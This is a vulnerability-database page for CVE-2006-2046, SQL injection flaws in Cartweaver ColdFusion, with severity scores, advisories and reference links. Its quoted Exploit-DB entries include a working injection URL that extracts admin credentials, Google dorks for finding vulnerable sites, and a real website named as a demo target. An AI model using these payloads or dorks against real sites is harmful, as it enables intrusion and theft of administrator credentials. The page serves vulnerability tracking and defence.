CVE-2006-2046
published 2006-04-26CVE-2006-2046: Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2.16.11 and earlier allow remote attackers to execute arbitrary SQL…
PriorityP338medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
4.05%
89.4th percentile
Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2.16.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) category and (2) keywords parameters in (a) Results.cfm, and the (3) ProdID parameter in (b) Details.cfm.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| application_dynamics | cartweaver | — | — |
| application_dynamics | cartweaver_coldfusion | <= 2.16.11 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c88w-8m4x-2r4w: SQL injection vulnerability in details
ghsa_unreviewed·2022-05-01·CVSS 6.4
CVE-2008-2918 [MEDIUM] CWE-89 GHSA-c88w-8m4x-2r4w: SQL injection vulnerability in details
SQL injection vulnerability in details.php in Application Dynamics Cartweaver 3.0 allows remote attackers to execute arbitrary SQL commands via the prodId parameter, possibly a related issue to CVE-2006-2046.3.
GHSA
GHSA-4hp9-9cg9-jj2r: Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2
ghsa_unreviewed·2022-05-01
CVE-2006-2046 [MEDIUM] GHSA-4hp9-9cg9-jj2r: Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2
Multiple SQL injection vulnerabilities in Application Dynamics Cartweaver ColdFusion 2.16.11 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) category and (2) keywords parameters in (a) Results.cfm, and the (3) ProdID parameter in (b) Details.cfm.
No detection rules found.
Exploit-DB
Cartweaver 2.16.11 - 'ProdID' SQL Injection
exploitdb·2007-08-06
CVE-2006-2046 Cartweaver 2.16.11 - 'ProdID' SQL Injection
Cartweaver 2.16.11 - 'ProdID' SQL Injection
---
author:meoconx[at]vnbrain.net
product:CartWeaver
main site:www.cartweaver.com
1.with CFM CartWeaver:
sql injection in:
Details.cfm?ProdID=a'
demo:
http://www.jbracing.co.uk/Details.cfm?ProdID=1'
exploit:
http://www.xxx.com/Details.cfm?ProdID=[sql query]
link admin:
http://www.xxx.com/[script path]/cw2/admin/
dork:
allinurl:Details.cfm ?ProdID=
allinurl:Results.cfm?category=
An example:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1'
exploit it:
-get username:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers))
Conversion failed when converting the nvarchar value 'jim' to data type int.
==> the username is "jim"
-get password:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1
Exploit-DB
Cartweaver 2.16.11 - 'Results.cfm' SQL Injection
exploitdb·2006-04-25
CVE-2006-2046 Cartweaver 2.16.11 - 'Results.cfm' SQL Injection
Cartweaver 2.16.11 - 'Results.cfm' SQL Injection
---
source: https://www.securityfocus.com/bid/17941/info
Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/Results.cfm?category=[SQL]
http://www.example.com/Results.cfm?keywords=[SQL]
No writeups or analysis indexed.
http://pridels0.blogspot.com/2006/04/cartweaver-coldfusion-vuln.htmlhttp://secunia.com/advisories/19812http://www.osvdb.org/24961http://www.osvdb.org/24962http://www.securityfocus.com/bid/17941http://www.securityfocus.com/bid/25210http://www.techfeed.net/blog/index.cfm/2006/4/26/cartweaver-holeshttp://www.vupen.com/english/advisories/2006/1513https://exchange.xforce.ibmcloud.com/vulnerabilities/26060https://www.exploit-db.com/exploits/4264http://pridels0.blogspot.com/2006/04/cartweaver-coldfusion-vuln.htmlhttp://secunia.com/advisories/19812http://www.osvdb.org/24961http://www.osvdb.org/24962http://www.securityfocus.com/bid/17941http://www.securityfocus.com/bid/25210http://www.techfeed.net/blog/index.cfm/2006/4/26/cartweaver-holeshttp://www.vupen.com/english/advisories/2006/1513https://exchange.xforce.ibmcloud.com/vulnerabilities/26060https://www.exploit-db.com/exploits/4264
2006-04-26
Published